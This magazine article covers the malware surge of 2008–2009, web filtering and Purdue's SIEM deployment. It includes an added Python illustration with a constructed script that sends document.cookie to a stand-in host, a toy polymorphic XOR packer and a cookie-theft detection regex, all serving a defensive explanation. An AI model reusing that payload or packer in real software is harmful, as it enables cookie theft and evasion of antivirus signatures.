Absence of Malware
MALWARE HAS BEEN GROWING in recent years; 2008 saw that trend continue at an accelerated pace, with some vendors reporting more new infections than they had seen in their entire histories.
Part of this surge is attributable to hackers making off-the-shelf versions available to anyone for a price. Another concern is the way that the malware is spread. Whereas such tools used to be delivered mainly via e-mail attachment, they’re now increasingly spread via Web sites. IBM reported that the number of new malicious Web links increased 508 percent in the first half of 2009 compared to the first half of 2008.
Malware is also becoming much harder to detect. For years, hackers employed masking techniques to evade antivirus (AV) detection, but newer methods have become increasingly sophisticated. For example, much modern malware now changes dynamically; some strains mutate each time the hosting Web site is visited, so no two victims receive the same bytes.
To fight this ever-shifting threat, organizations need a “cocktail” of solutions, says Forrester analyst Chenxi Wang.
One malware-fighting ingredient that shows promise, she says, is Web filtering. Filtering combines behavioral, reputation-based, and other technologies to detect Web page and e-mail-borne malicious code in real time.
Another part of the cocktail could consist of security information and event management (SIEM) tools. Many organizations are completely unaware that they have multiple infected machines, and finding those infections can mean arduous sifting through mountains of log data from many layers of the network. SIEM solutions can help pinpoint even sophisticated infections so that they can be eradicated.
Following is an overview of the crimeware explosion, a look at advances in Web filtering, and an example of how one university is using a SIEM tool to help eradicate hard-to-find malware once it has infected a network.
Growing Menace
PandaLabs, the research lab of Spain-based Panda Security, identified about 35,000 new pieces of malware each day in 2008, for an annual total of about 15 million new strains. This annual figure surpassed beginning-of-the-year estimates by 5 million. It was also so high that in the year’s first eight months, the company had detected more strains than it had in the first 17 years of its existence.
Trojans were the most common type of malware found, representing about 70 percent of the total; Trojans are designed to steal information, install backdoors, and delete or encrypt files and other data. They were followed by adware, representing about 20 percent, and worms, which made up about 4 percent of the mix. Together these three types constituted about 94 percent of infections.
Much of this growth has to do with the increasingly widespread availability of toolkits, according to Panda. Designed by professional hackers, the kits can be used by people with few computer skills.
Toolkits are currently used mainly to infect Web sites, says Forrester’s Wang. That may explain why there has been tremendous growth in the number of infected Web pages in the past year.
The number of crimeware-infected sites increased 827 percent from January to December 2008, according to the Anti-Phishing Working Group, a coalition of industry and law enforcement agencies aligned against malware.
Toolkit Trojans are often designed to receive updates. Users can frequently choose among multiple functions, and the kits can often be remotely controlled to receive future instructions, according to PandaLabs. One toolkit that Panda found late last year, which the company called BitTera.C, could spread infection via e-mail or Web page. It offered dozens of boxes that users could check to switch on functions, such as online and offline keyloggers, for instance.
The toolkit's users could choose to disable parts of a victim's computer, such as the registry, task manager, system recovery, firewall, other security programs, and automatic updates. It was easy to use; according to a Panda post, it could "construct the malware you want in minutes."
After infecting victims' machines, the Trojans send the information they harvest back to servers. Security vendor Finjan of Israel found 10 times the volume of stolen information in the early part of 2009 as in the same period of 2008, according to Yuval Ben-Itzhak, the company's chief technology officer. He says he sees no slowdown ahead. With the slumping economy, it's likely that both toolkit manufacturing and demand will rise.
Malware is also becoming much harder to detect. AV companies typically analyze a suspect piece of malware to derive a signature, a pattern that identifies that particular code. They then push out an antimalware update designed to detect and block programs matching that signature.
One way hackers have evaded these defenses is by encrypting the malicious part of the malware's code, according to Ben-Itzhak. More recently, though, hackers have concealed malware with "dynamic code obfuscation," which can involve randomly modifying the malware's function names and also varying its encryption keys.
With BitTera.C, purchasers can customize the way the Trojan masks itself, choosing to add encryption and polymorphism, for example. These kinds of dynamic changes can make malware appear different each time someone visits a Web site, making meaningful signatures difficult to establish.
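The following is an added illustration of why the dynamic changes described above defeat fixed signatures; it is not code from BitTera.C, Finjan, or Panda. It uses a constructed, harmless stand-in for a malicious script body, a hash-style signature, and a toy "polymorphic" packer that renames the function and XOR-encodes the body under a per-variant key (the real kits' packing schemes are not described on the page, so this mechanism is an assumption). A byte-level signature taken from one variant misses the next; a check that unpacks the code and looks at what it does still fires.

```python
import hashlib
import os
import re
from typing import Optional, Set

# Constructed stand-in for a cookie-stealing script body. Not real malware.
PAYLOAD = b"function steal(){document.location='http://example.invalid/c?'+document.cookie}"

KEY_LEN = 8  # assumed key size for the toy packer


def signature(blob: bytes) -> str:
    """Hash-style signature, as a simple signature-based AV entry would use."""
    return hashlib.sha256(blob).hexdigest()


def polymorph(payload: bytes, func_name: bytes = b"steal",
              key: Optional[bytes] = None) -> bytes:
    """Build one variant: rename the function, XOR-encode under a (fresh) key,
    and prepend the key so the variant can unpack itself. Same behaviour,
    different bytes for every new key or name."""
    key = key or os.urandom(KEY_LEN)
    if len(key) != KEY_LEN:
        raise ValueError("key must be %d bytes" % KEY_LEN)
    mutated = payload.replace(b"steal", func_name)
    body = bytes(b ^ key[i % KEY_LEN] for i, b in enumerate(mutated))
    return key + body


def deobfuscate(blob: bytes) -> bytes:
    """What the variant's own loader does at run time: recover the plain script."""
    key, body = blob[:KEY_LEN], blob[KEY_LEN:]
    return bytes(b ^ key[i % KEY_LEN] for i, b in enumerate(body))


def signature_match(blob: bytes, known: Set[str]) -> bool:
    """Signature check: exact match against previously seen variants only."""
    return signature(blob) in known


def behaviour_match(blob: bytes) -> bool:
    """Behaviour-oriented check: unpack first, then look for the action
    (sending document.cookie off-site) rather than for fixed bytes."""
    plain = deobfuscate(blob)
    return re.search(rb"document\.location\s*=.*document\.cookie", plain) is not None


if __name__ == "__main__":
    first = polymorph(PAYLOAD)                      # what the AV lab analysed
    second = polymorph(PAYLOAD, func_name=b"q7zk")  # what the next visitor receives
    known = {signature(first)}
    print("first variant, signature:", signature_match(first, known),
          "behaviour:", behaviour_match(first))
    print("second variant, signature:", signature_match(second, known),
          "behaviour:", behaviour_match(second))
```

The regex in `behaviour_match` is deliberately narrow; a production scanner models many such actions and runs them against the unpacked or emulated code, but the asymmetry is the same: the attacker changes the bytes for free, while the behaviour the code must perform to be useful stays put.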
Smart Detection
There's no single way to beat today's malware threats, but Web filtering tools now offer smarter detection technology to stop malware from passing through an organization's perimeter.
One leader in this space has been Finjan, according to Peter Christy, a principal at the Los Altos, California-based Internet Research Group.
Finjan’s patented behavior-based, real-time scanning technology examines code inside a Web page before it executes. It deconstructs the code and matches it against existing models. It analyzes the behavior of the program, including looking at the executables it wants to run, and then makes an intelligent decision, says Christy.
Most behavior-based technology examines malware later on, as it’s executing, says Ben-Itzhak, “but this can be dangerous.” Finjan recently updated its product to examine Adobe’s PDF files and Flash Player, both of which have been big recent malware targets.
In the cloud. Some vendors have started offering in-the-cloud Web filtering solutions with real-time code scanning. Such products act like a Web proxy; the vendors’ servers intercept an organization’s Web traffic. The solutions can create additional efficiencies and generate more layers of intelligent scanning, says Wang. She acknowledges, however, that since such solutions are new, they may have some yet-undiscovered risks of their own.
Trend Micro was the first major antimalware vendor to offer such services last year. The company’s Smart Protection Network examines Web, e-mail, and file data and compares it to constantly updated, in-the-cloud threat databases. Malicious content is stopped before it can enter a company’s network.
This service includes reputation scanning: Web domains are given a score based on a site’s age, historical location, and past malware activities. With e-mail, IP addresses are validated in real time against a reputation database of known spam sources.
Trend Micro’s network also uses real-time behavior-based technology to detect malware. An additional protective layer consists of a feedback loop, continually exchanging information between Trend Micro’s customers and its databases.
Network Intel
Once malware has entered an organization, it can be extremely difficult to detect. Some analysts say IT managers need a more intelligent view of suspicious behavior happening in their systems and machines.
Companies need technology “to provide the air cover by ensuring that applications and networks don’t have vulnerabilities and are not behaving abnormally or transmitting data that they shouldn’t,” explains Forrester senior security analyst Khalid Kark in a report. SIEM tools are now being touted as a way to achieve this comprehensive view.
Higher Learning
About three years ago, the IT department at Purdue University in West Lafayette, Indiana, wanted a better way to review the institution's gigabytes of log data. At the time, there was no feasible way for IT staff to search the logs for malicious activity, according to Scott Ksander, IT networks and security executive director. Consequently, the staff was forced to be reactive, and the ongoing effort to eradicate infections on machines across campus was like putting out brush fires.
Ksander wanted to better understand how the attacks had succeeded so that he could tighten the university's perimeter defenses. He also wanted a way to see when malware, which typically self-spreads, started to infect the systems, and he wanted to see how it worked.
Initially, he and his staff made some homegrown tools, which involved scripting and "digging out" a lot of data, he says. The information that he wanted to correlate came from several major sources: the university's main anti-malware vendor, Santa Clara, California-based McAfee; internal e-mail logs; and NetFlow data from the university's Cisco Systems (San Jose, California) network devices, showing which machines were using which ports to connect to which sites.
The in-house tools had a primitive ability to correlate data, he says, but required considerable “care and feeding.”
Last year, Ksander started looking at SIEM tools. He wanted a way to correlate his numerous log streams into a single database, which could be viewed from one console. He chose QRadar, a tool from Q1 Labs, of Waltham, Massachusetts, he says, partly because he was able to get good pricing. The program integrates log management, network behavior analytics, and security event management.
Personalization. The most time-consuming part of setting up the tool was configuration, says Ksander. Much of this work involved filling in form fields based on his organization’s sources of data. In setting up the process, he learned from mistakes he had made with his prior in-house tools, he says.
This implementation took about a month, with one staffer working almost full-time and two others advising on a part-time basis.
Consolidated view. Now that the SIEM solution is operational, IT is able to look at data to learn about discovered and potential infections with just a few keystrokes, says Ksander. Before SIEM, “it was a little like trying to find Web information before Google.”
The tool’s forensic capabilities are critical, Ksander says. If he learns about a malware infection, he can use the tool to examine its behavior.
A lot of the correlation concerns timing, he says. He can examine when an infection occurred and then look at how a machine’s behavior, such as the ports it was connecting through, changed before and after an infection.
By learning about port and site connectivity, the IT staff gets the information it needs to assess how to tighten the university’s network defenses. Ksander says that he adjusts the school’s intrusion prevention system (IPS) constantly, as he gets new information. He can tweak the IPS to allow or disallow certain connections or activities across a network.
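The before-and-after comparison Ksander describes is, at its core, a join of an AV detection event with the flow records for the same host. The following is an added example of that correlation over a few constructed records; it is not QRadar's logic, not Purdue's data, and the record format (timestamp, source, destination, destination port) is an assumption chosen to resemble a NetFlow export.

```python
from collections import namedtuple
from datetime import datetime, timedelta

Flow = namedtuple("Flow", "ts src dst dport")

# Constructed flow records: timestamp, source host, destination, destination port.
# Addresses are documentation ranges; nothing here is real traffic.
FLOWS = """\
2009-03-02T08:01:10 10.20.5.17 192.0.2.10 80
2009-03-02T08:05:42 10.20.5.17 192.0.2.10 443
2009-03-02T09:12:03 10.20.5.17 198.51.100.7 25
2009-03-02T09:14:55 10.20.5.17 203.0.113.9 6667
2009-03-02T09:15:30 10.20.5.17 203.0.113.9 6667
2009-03-02T09:20:01 10.20.5.17 192.0.2.10 80
2009-03-02T09:22:11 10.20.5.88 192.0.2.10 80
"""

# Constructed AV event: the host and the time the anti-malware agent first fired.
AV_EVENTS = {"10.20.5.17": "2009-03-02T09:10:00"}


def parse_flows(text):
    """Parse the whitespace-separated flow lines into Flow tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, dport = line.split()
        flows.append(Flow(datetime.fromisoformat(ts), src, dst, int(dport)))
    return flows


def correlate(flows, av_events, window=timedelta(hours=2)):
    """For each host with an AV detection, compare the (destination, port) pairs
    it used in the window before the detection with those in the window after,
    and report what is new, with the first time each new pair was seen."""
    report = {}
    for host, when in av_events.items():
        t0 = datetime.fromisoformat(when)
        before, after, first_seen = set(), set(), {}
        for f in sorted(flows, key=lambda f: f.ts):
            if f.src != host:
                continue
            pair = (f.dst, f.dport)
            if t0 - window <= f.ts < t0:
                before.add(pair)
            elif t0 <= f.ts <= t0 + window:
                after.add(pair)
                first_seen.setdefault(pair, f.ts)
        new_pairs = after - before
        report[host] = {
            "detected": t0.isoformat(),
            "before": sorted(before),
            "after": sorted(after),
            "new_pairs": sorted(new_pairs),
            # ports the host never used before detection: candidates for an IPS rule
            "new_ports": sorted({p for _, p in after} - {p for _, p in before}),
            "first_seen": {"%s:%d" % pair: ts.isoformat()
                           for pair, ts in first_seen.items() if pair in new_pairs},
        }
    return report


if __name__ == "__main__":
    for host, r in correlate(parse_flows(FLOWS), AV_EVENTS).items():
        print(host, "detected at", r["detected"])
        print("  new destinations:", r["new_pairs"])
        print("  new ports:", r["new_ports"])
        print("  first seen:", r["first_seen"])
```

On the sample data the infected host's pre-detection traffic is ordinary Web browsing, and the new activity afterwards is outbound SMTP and an IRC-style port to hosts it had never contacted; those are the connections an analyst would take to the IPS. The `first_seen` timestamps also show that the new traffic began a few minutes after the AV alert, which is the kind of onset information Ksander says he uses to judge how far an infection had spread.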
Another valuable aspect of the SIEM tool is that it can help IT assess whether an infection was the result of an outside attack or whether the malware might have been planted from within. If the evidence points to an inside job, IT can call up access logs, which are also fed into QRadar.
Although QRadar can be set to produce alerts, Ksander also recognizes that the human factor is still key. He notes that some of his most valuable tips come from university computer users. They tend to be the first to notice many infections, he says, especially the worst ones.
With that in mind, his department has placed a growing emphasis on good reporting mechanisms in the past few years, Ksander says. For example, he has put a large icon on the IT department’s Web site that users can click on to report suspicious behavior.
“It can be something as simple as ‘my machine is acting weird,’” explains Ksander. After such alerts, the staff can then use the SIEM solution to get a handle on any malware’s behavior, timing, and degree of spread.
Although Purdue had only been using the SIEM program for a few months when Ksander was interviewed for this article, his sense was that it requires considerably less ongoing maintenance than the previous tools.
He finds that it is both effective and somewhat satisfying to use. He likens it to detective work, noting, “There’s a CSI [Crime Scene Investigation] feel to it.”
Ksander’s experience illustrates how companies are learning to combat the ballooning malware threat. They will, however, have to remain ready to adjust their tactics as the hackers think of new modes of attack.
John Wagley is an associate editor at Security Management.